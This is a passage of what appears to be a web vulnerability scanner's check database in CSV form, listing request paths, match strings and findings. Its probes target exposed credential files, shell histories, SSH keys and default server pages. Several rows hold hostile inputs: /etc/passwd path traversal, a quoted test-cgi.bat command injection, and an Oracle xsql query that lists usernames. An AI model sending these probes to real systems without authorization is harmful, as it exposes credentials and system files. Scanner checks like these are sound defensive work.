has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002718\",\"3093\",\"1\",\"/ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002719\",\"3093\",\"1\",\"@CGIDIRS_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002720\",\"3093\",\"1\",\"@CGIDIRS_vti_pvt/doctodep.btr\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002721\",\"3093\",\"1\",\"@CGIDIRScfgwiz.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"cfgwiz.exe is a Norton Anti-Virus file and should not be available via the web site.\",\"\",\"\"\n\"002722\",\"3093\",\"1\",\"@CGIDIRSCgitest.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002723\",\"3093\",\"1\",\"@CGIDIRSmailform.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002724\",\"3093\",\"1\",\"@CGIDIRSms_proxy_auth_query/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002725\",\"3093\",\"1\",\"@CGIDIRSpost16.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002726\",\"3093\",\"2\",\"/oem_webstage/oem.conf\",\"GET\",\"DocumentRoot\",\"\",\"\",\"\",\"\",\"Oracle reveals a portion of the Apache httpd.conf file.\",\"\",\"\"\n\"002727\",\"3093\",\"2\",\"/database/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Databases? Really??\",\"\",\"\"\n\"002728\",\"3093\",\"2\",\"/demo/sql/index.jsp\",\"GET\",\"JSP SQL Samples\",\"\",\"\",\"\",\"\",\"This default may allow connectivity to the Oracle databases.\",\"\",\"\"\n\"002729\",\"3093\",\"23\",\"@CGIDIRS.htaccess\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains authorization information\",\"\",\"\"\n\"002730\",\"3093\",\"23\",\"@CGIDIRS.htaccess.old\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Backup/Old copy of .htaccess - Contains authorization information\",\"\",\"\"\n\"002731\",\"3093\",\"23\",\"@CGIDIRS.htaccess.save\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Backup/Old copy of .htaccess - Contains authorization information\",\"\",\"\"\n\"002732\",\"3093\",\"23\",\"@CGIDIRS.htaccess~\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Backup/Old copy of .htaccess - Contains authorization information\",\"\",\"\"\n\"002733\",\"3093\",\"23\",\"@CGIDIRS.htpasswd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains authorization information\",\"\",\"\"\n\"002734\",\"3093\",\"23\",\"@CGIDIRS.passwd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains authorization information\",\"\",\"\"\n\"002735\",\"3093\",\"3\",\"/.wwwacl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains authorization information\",\"\",\"\"\n\"002736\",\"3093\",\"3\",\"/.www_acl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains authorization information\",\"\",\"\"\n\"002737\",\"3093\",\"3\",\"@CGIDIRS.wwwacl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains authorization information\",\"\",\"\"\n\"002738\",\"3093\",\"3\",\"@CGIDIRS.www_acl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains authorization information\",\"\",\"\"\n\"002739\",\"3093\",\"3\",\"/.htpasswd\",\"GET\",\"200\",\"\",\":\",\"\",\"\",\"Contains authorization information\",\"\",\"\"\n\"002740\",\"3093\",\"3\",\"/.access\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains authorization information\",\"\",\"\"\n\"002741\",\"3093\",\"3\",\"/.addressbook\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PINE addressbook, may store sensitive e-mail address contact information and notes\",\"\",\"\"\n\"002742\",\"3093\",\"3\",\"/.bashrc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"User home dir was found with a shell rc file. This may reveal file and path information.\",\"\",\"\"\n\"002743\",\"3093\",\"3\",\"/.bash_history\",\"GET\",\"^(grep|cat|dir|ifconfig|history|vim|touch|head|tail)\",\"\",\"200\",\"\",\"\",\"A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"002744\",\"3093\",\"3\",\"/.forward\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to.\",\"\",\"\"\n\"002745\",\"3093\",\"3\",\"/.history\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"002746\",\"3093\",\"3\",\"/.htaccess\",\"GET\",\"200\",\"<files\",\"\",\"\",\"\",\"Contains configuration and/or authorization information\",\"\",\"\"\n\"002747\",\"3093\",\"3\",\"/.lynx_cookies\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites.\",\"\",\"\"\n\"002748\",\"3093\",\"3\",\"/.mysql_history\",\"GET\",\"^(INSERT|insert|delete|DELETE|drop|DROP|grant|GRANT|select|SELECT)\",\"\",\"200\",\"\",\"\",\"Database SQL?\",\"\",\"\"\n\"002749\",\"3093\",\"3\",\"/.passwd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains authorization information\",\"\",\"\"\n\"002750\",\"3093\",\"3\",\"/.pinerc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"User home dir found with a PINE rc file. May reveal system information, directories and more.\",\"\",\"\"\n\"002751\",\"3093\",\"3\",\"/.plan\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol \",\"\",\"\"\n\"002752\",\"3093\",\"3\",\"/.proclog\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"User home dir with a Procmail log file. May reveal user mail traffic, directories and more.\",\"\",\"\"\n\"002753\",\"3093\",\"3\",\"/.procmailrc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"User home dir with a Procmail rc file. May reveal subdirectories, mail contacts and more.\",\"\",\"\"\n\"002754\",\"3093\",\"3\",\"/.profile\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"User home dir with a shell profile was found. May reveal directory information and system configuration.\",\"\",\"\"\n\"002755\",\"3093\",\"3\",\"/.rhosts\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"002756\",\"3093\",\"3\",\"/.sh_history\",\"GET\",\"^(grep|cat|dir|ifconfig|history|vim|touch|head|tail)\",\"\",\"200\",\"\",\"\",\"A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"002757\",\"3093\",\"3\",\"/.ssh\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"002758\",\"3093\",\"3\",\"/.ssh/authorized_keys\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"002759\",\"3093\",\"3\",\"/.ssh/known_hosts\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"002760\",\"31\",\"3\",\"@CGIDIRSls\",\"GET\",\" neither '\\/\",\"\",\"\",\"\",\"\",\"The CERN server lets attackers view the host's path. Should be upgraded to Apache, as CERN is not maintained.\",\"\",\"\"\n\"002761\",\"3133\",\"7\",\"////../../data/config/microsrv.cfg\",\"GET\",\"HostName\",\"\",\"\",\"\",\"\",\"Xerox WorkCentre allows any file to be retrieved remotely.\",\"\",\"\"\n\"002762\",\"3133\",\"7\",\"////////../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Xerox WorkCentre allows any file to be retrieved remotely.\",\"\",\"\"\n\"002763\",\"3233\",\"b\",\"/_vti_bin/shtml.exe/_vti_rpc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage may be installed.\",\"\",\"\"\n\"002764\",\"3233\",\"2\",\"/doc/rt/overview-summary.html\",\"GET\",\"Packages\",\"\",\"Oracle Business Components\",\"\",\"\",\"Oracle Business Components for Java docs is running.\",\"\",\"\"\n\"002765\",\"3233\",\"2\",\"/docs/sdb/en/html/index.html\",\"GET\",\"Support Database\",\"\",\"\",\"\",\"\",\"This may be a default SuSe Apache install. This is the support page.\",\"\",\"\"\n\"002766\",\"3233\",\"2\",\"/jservdocs/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default Apache JServ docs should be removed.\",\"\",\"\"\n\"002767\",\"3233\",\"2\",\"/test/jsp/buffer1.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002768\",\"3233\",\"2\",\"/test/jsp/buffer2.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002769\",\"3233\",\"2\",\"/test/jsp/buffer3.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002770\",\"3233\",\"2\",\"/test/jsp/buffer4.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002771\",\"3233\",\"2\",\"/test/jsp/declaration/IntegerOverflow.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002772\",\"3233\",\"2\",\"/test/jsp/extends1.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002773\",\"3233\",\"2\",\"/test/jsp/extends2.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002774\",\"3233\",\"2\",\"/test/jsp/Language.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002775\",\"3233\",\"2\",\"/test/jsp/pageAutoFlush.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002776\",\"3233\",\"2\",\"/test/jsp/pageDouble.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002777\",\"3233\",\"2\",\"/test/jsp/pageExtends.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002778\",\"3233\",\"2\",\"/test/jsp/pageImport2.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002779\",\"3233\",\"2\",\"/test/jsp/pageInfo.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002780\",\"3233\",\"2\",\"/test/jsp/pageInvalid.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002781\",\"3233\",\"2\",\"/test/jsp/pageIsErrorPage.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002782\",\"3233\",\"2\",\"/test/jsp/pageIsThreadSafe.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002783\",\"3233\",\"2\",\"/test/jsp/pageSession.jsp\",\"GET\",\"Internal Servlet\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002784\",\"3233\",\"2\",\"/test/realPath.jsp\",\"GET\",\"WEBROOT\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002785\",\"3233\",\"2\",\"/tomcat-docs/index.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default Apache Tomcat documentation found.\",\"\",\"\"\n\"002786\",\"3233\",\"2\",\"@CGIDIRStest-cgi.bat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This is an Apache for Win default. If Apache is lower than 1.3.23, this can be exploited as in test-cgi.bat?|dir+c:+>..\\htdocs\\listing.txt, but may not allow data sent back to the browser.\",\"\",\"\"\n\"002787\",\"3233\",\"2\",\"/akopia/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Akopia is installed.\",\"\",\"\"\n\"002788\",\"3233\",\"2\",\"/bc4j.html\",\"GET\",\"Business Components\",\"\",\"\",\"\",\"\",\"Default Oracle page, may allow limited administration.\",\"\",\"\"\n\"002789\",\"3233\",\"2\",\"/dms0\",\"GET\",\"DMSDUMP\",\"\",\"\",\"\",\"\",\"Default Oracle 9iAS allows access to Dynamic Monitoring Services\",\"\",\"\"\n\"002790\",\"3233\",\"2\",\"/jspdocs/\",\"GET\",\"OracleJSP\",\"\",\"\",\"\",\"\",\"Default Oracle JSP documentation.\",\"\",\"\"\n\"002791\",\"3233\",\"2\",\"/mod_ose_docs\",\"GET\",\"Oracle Servlet Engine\",\"\",\"\",\"\",\"\",\"Default Oracle documentation found.\",\"\",\"\"\n\"002792\",\"3233\",\"2\",\"/ojspdemos/basic/hellouser/hellouser.jsp\",\"GET\",\"200\",\"License Exception\",\"\",\"\",\"\",\"Oracle 9i default JSP page found, may be vulnerable to XSS in any field.\",\"\",\"\"\n\"002793\",\"3233\",\"2\",\"/ojspdemos/basic/simple/usebean.jsp\",\"GET\",\"200\",\"License Exception\",\"\",\"\",\"\",\"Oracle 9i default JSP page found, may be vulnerable to XSS in any field.\",\"\",\"\"\n\"002794\",\"3233\",\"2\",\"/ojspdemos/basic/simple/welcomeuser.jsp\",\"GET\",\"200\",\"License Exception\",\"\",\"\",\"\",\"Oracle 9i default JSP page found, may be vulnerable to XSS in any field.\",\"\",\"\"\n\"002795\",\"3233\",\"2\",\"/oprocmgr-status\",\"GET\",\"Module Name\",\"\",\"\",\"\",\"\",\"Oracle 9iAS default install allows access to the Java Process Manager.\",\"\",\"\"\n\"002796\",\"3233\",\"2\",\"/php/index.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Monkey Http Daemon default PHP file found.\",\"\",\"\"\n\"002797\",\"3233\",\"2\",\"/pls/portal30/admin_/\",\"GET\",\"Gateway Configuration Menu\",\"\",\"\",\"\",\"\",\"Default Oracle 9iAS allows unrestricted access to the mod_plsql DAD admin interface.\",\"\",\"\"\n\"002798\",\"3233\",\"2\",\"/pls/simpledad/admin_/\",\"GET\",\"Gateway Configuration Menu\",\"\",\"\",\"\",\"\",\"This default may allow limited administration of the Oracle server.\",\"\",\"\"\n\"002799\",\"3233\",\"2\",\"/pls/simpledad/admin_/gateway.htm?schema=sample\",\"GET\",\"Gateway Configuration Menu\",\"\",\"\",\"\",\"\",\"This default may allow limited administration of the Oracle server.\",\"\",\"\"\n\"002800\",\"3233\",\"2\",\"/pls/simpledad/admin_/globalsettings.htm\",\"GET\",\"edit global gateway\",\"\",\"\",\"\",\"\",\"Oracle admin script allows modification of database information.\",\"\",\"\"\n\"002801\",\"3233\",\"2\",\"/search/\",\"GET\",\"Sample Search Interface\",\"\",\"\",\"\",\"\",\"Default iPlanet search is enabled.\",\"\",\"\"\n\"002802\",\"3233\",\"2\",\"/servlet/Counter\",\"GET\",\"200\",\"Error Occurred\",\"\",\"\",\"\",\"JRun default servlet found. All default code should be removed from servers.\",\"\",\"\"\n\"002803\",\"3233\",\"2\",\"/servlet/DateServlet\",\"GET\",\"200\",\"Error Occurred\",\"\",\"\",\"\",\"JRun default servlet found. All default code should be removed from servers.\",\"\",\"\"\n\"002804\",\"3233\",\"2\",\"/servlet/FingerServlet\",\"GET\",\"200\",\"Error Occurred\",\"\",\"\",\"\",\"JRun default servlet found. All default code should be removed from servers.\",\"\",\"\"\n\"002805\",\"3233\",\"2\",\"/servlet/HelloWorldServlet\",\"GET\",\"200\",\"Error Occurred\",\"\",\"\",\"\",\"JRun default servlet found. All default code should be removed from servers.\",\"\",\"\"\n\"002806\",\"3233\",\"2\",\"/servlet/IsItWorking\",\"GET\",\"Yes, It's working\",\"\",\"\",\"\",\"\",\"Default Java (JServ) pages are present.\",\"\",\"\"\n\"002807\",\"3233\",\"2\",\"/servlet/SessionServlet\",\"GET\",\"200\",\"Error Occurred\",\"\",\"\",\"\",\"JRun or Netware WebSphere default servlet found. All default code should be removed from servers.\",\"\",\"\"\n\"002808\",\"3233\",\"2\",\"/servlet/SimpleServlet\",\"GET\",\"200\",\"Error Occurred\",\"\",\"\",\"\",\"JRun default servlet found (possibly Websphere). All default code should be removed from servers.\",\"\",\"\"\n\"002809\",\"3233\",\"2\",\"/servlet/SnoopServlet\",\"GET\",\"200\",\"Error Occurred\",\"\",\"\",\"\",\"JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.\",\"\",\"\"\n\"002810\",\"3233\",\"2\",\"/xdk/\",\"GET\",\"Oracle XML Development\",\"\",\"\",\"\",\"\",\"Default Oracle documentation found.\",\"\",\"\"\n\"002811\",\"3233\",\"2\",\"/xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS\",\"GET\",\"USERNAME\",\"\",\"\",\"\",\"\",\"This allows attackers to perform queries to the Oracle database. This sample app should be removed.\",\"\",\"\"\n\"002812\",\"3233\",\"2\",\"/admcgi/contents.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002813\",\"3233\",\"2\",\"/admcgi/scripts/Fpadmcgi.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002814\",\"3233\",\"2\",\"/admisapi/fpadmin.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage file found.\",\"\",\"\"\n\"002815\",\"3233\",\"2\",\"/bin/admin.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002816\",\"3233\",\"2\",\"/bin/cfgwiz.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002817\",\"3233\",\"2\",\"/bin/CGImail.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002818\",\"3233\",\"2\",\"/bin/contents.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002819\",\"3233\",\"2\",\"/bin/fpadmin.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002820\",\"3233\",\"2\",\"/bin/fpremadm.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002821\",\"3233\",\"2\",\"/bin/fpsrvadm.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002822\",\"3233\",\"2\",\"/cgi-bin/admin.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002823\",\"3233\",\"2\",\"/cgi-bin/cfgwiz.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002824\",\"3233\",\"2\",\"/cgi-bin/CGImail.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002825\",\"3233\",\"2\",\"/cgi-bin/contents.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002826\",\"3233\",\"2\",\"/cgi-bin/fpadmin.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002827\",\"3233\",\"2\",\"/cgi-bin/fpremadm.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002828\",\"3233\",\"2\",\"/cgi-bin/fpsrvadm.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002829\",\"3233\",\"2\",\"/scripts/admin.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002830\",\"3233\",\"2\",\"/scripts/cfgwiz.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002831\",\"3233\",\"2\",\"/scripts/CGImail.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002832\",\"3233\",\"2\",\"/scripts/contents.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002833\",\"3233\",\"2\",\"/scripts/fpadmin.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002834\",\"3233\",\"2\",\"/scripts/fpcount.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002835\",\"3233\",\"2\",\"/scripts/fpremadm.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002836\",\"3233\",\"2\",\"/scripts/fpsrvadm.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002837\",\"3233\",\"2\",\"/_private/\",\"GET\",\"200\",\"\",\"\",\"cannot be displayed\",\"\",\"FrontPage directory found.\",\"\",\"\"\n\"002838\",\"3233\",\"2\",\"/_private/orders.htm\",\"GET\",\"200\",\"\",\"\",\"cannot be displayed\",\"\",\"Default FrontPage file found.\",\"\",\"\"\n\"002839\",\"3233\",\"2\",\"/_private/orders.txt\",\"GET\",\"200\",\"\",\"\",\"cannot be displayed\",\"\",\"Default FrontPage file found.\",\"\",\"\"\n\"002840\",\"3233\",\"2\",\"/_private/register.htm\",\"GET\",\"200\",\"\",\"\",\"cannot be displayed\",\"\",\"Default FrontPage file found.\",\"\",\"\"\n\"002841\",\"3233\",\"2\",\"/_private/register.txt\",\"GET\",\"200\",\"\",\"\",\"cannot be displayed\",\"\",\"Default FrontPage file found.\",\"\",\"\"\n\"002842\",\"3233\",\"2\",\"/_private/registrations.htm\",\"GET\",\"200\",\"\",\"cannot be displayed\",\"\",\"\",\"Default FrontPage file found.\",\"\",\"\"\n\"002843\",\"3233\",\"2\",\"/_private/registrations.txt\",\"GET\",\"200\",\"\",\"\",\"cannot be displayed\",\"\",\"Default FrontPage file found.\",\"\",\"\"\n\"002844\",\"3233\",\"2\",\"/_private/_vti_cnf/\",\"GET\",\"200\",\"\",\"\",\"cannot be displayed\",\"\",\"FrontPage directory found.\",\"\",\"\"\n\"002845\",\"3233\",\"2\",\"/_vti_bin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage directory found.\",\"\",\"\"\n\"002846\",\"3233\",\"2\",\"/_vti_bin/admin.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002847\",\"3233\",\"2\",\"/_vti_bin/cfgwiz.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002848\",\"3233\",\"2\",\"/_vti_bin/CGImail.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002849\",\"3233\",\"2\",\"/_vti_bin/contents.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002850\",\"3233\",\"2\",\"/_vti_bin/fpadmin.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002851\",\"3233\",\"2\",\"/_vti_bin/fpremadm.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002852\",\"3233\",\"2\",\"/_vti_bin/fpsrvadm.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002853\",\"3233\",\"2\",\"/_vti_bin/_vti_cnf/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage directory found.\",\"\",\"\"\n\"002854\",\"3233\",\"2\",\"/_vti_cnf/_vti_cnf/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage directory found.\",\"\",\"\"\n\"002855\",\"3233\",\"2\",\"/_vti_inf.html\",\"GET\",\"FPVersion=\",\"\",\"\",\"\",\"\",\"FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).\",\"\",\"\"\n\"002856\",\"3233\",\"2\",\"/_vti_log/_vti_cnf/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage directory found.\",\"\",\"\"\n\"002857\",\"3233\",\"2\",\"/_vti_pvt/administrators.pwd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage file found, may be a password file.\",\"\",\"\"\n\"002858\",\"3233\",\"2\",\"/_vti_pvt/authors.pwd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage file found, may be a password file.\",\"\",\"\"\n\"002859\",\"3233\",\"2\",\"/_vti_pvt/service.pwd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage file found, may be a password file.\",\"\",\"\"\n\"002860\",\"3233\",\"2\",\"/_vti_pvt/users.pwd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage file found, may be a password file.\",\"\",\"\"\n\"002861\",\"3233\",\"2\",\"/manual/servlets/scripts/servlet1/servform.htm\",\"GET\",\"invokes a servlet\",\"\",\"\",\"\",\"\",\"iPlanet default servlet found. All default code should be removed.\",\"\",\"\"\n\"002862\",\"3233\",\"2\",\"/manual/servlets/scripts/shoes/shoeform.htm\",\"GET\",\"invokes a jsp\",\"\",\"\",\"\",\"\",\"iPlanet default servlet found. All default code should be removed.\",\"\",\"\"\n\"002863\",\"3233\",\"2\",\"/examples/\",\"GET\",\"Servlet Samples\",\"\",\"\",\"\",\"\",\"JEUS default servlet example pages present\",\"\",\"\"\n\"002864\",\"3233\",\"2\",\"/examples/context\",\"GET\",\"Context servlet\",\"\",\"\",\"\",\"\",\"JEUS default servlet examples disclose server directory\",\"\",\"\"\n\"002865\",\"3233\",\"2\",\"/examples/forward1\",\"GET\",\"Forward1 servlet\",\"\",\"\",\"\",\"\",\"JEUS default servlet example\",\"\",\"\"\n\"002866\",\"3233\",\"2\",\"/examples/forward2\",\"GET\",\"Forward2 servlet\",\"\",\"\",\"\",\"\",\"JEUS default servlet example\",\"\",\"\"\n\"002867\",\"3233\",\"2\",\"/examples/header\",\"GET\",\"Header servlet\",\"\",\"\",\"\",\"\",\"JEUS default servlet example\",\"\",\"\"\n\"002868\",\"3233\",\"2\",\"/examples/include1\",\"GET\",\"Include1 servlet\",\"\",\"\",\"\",\"\",\"JEUS default servlet example\",\"\",\"\"\n\"002869\",\"3233\",\"2\",\"/examples/info\",\"GET\",\"Info servlet\",\"\",\"\",\"\",\"\",\"JEUS default servlet example\",\"\",\"\"\n\"002870\",\"3233\",\"2\",\"/examples/jsp/index.html\",\"GET\",\"JSP Samples\",\"\",\"\",\"\",\"\",\"Tomcat or JEUS default JSP pages present.\",\"\",\"\"\n\"002871\",\"3233\",\"2\",\"/help/contents.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default Netscape manual found. All default pages should be 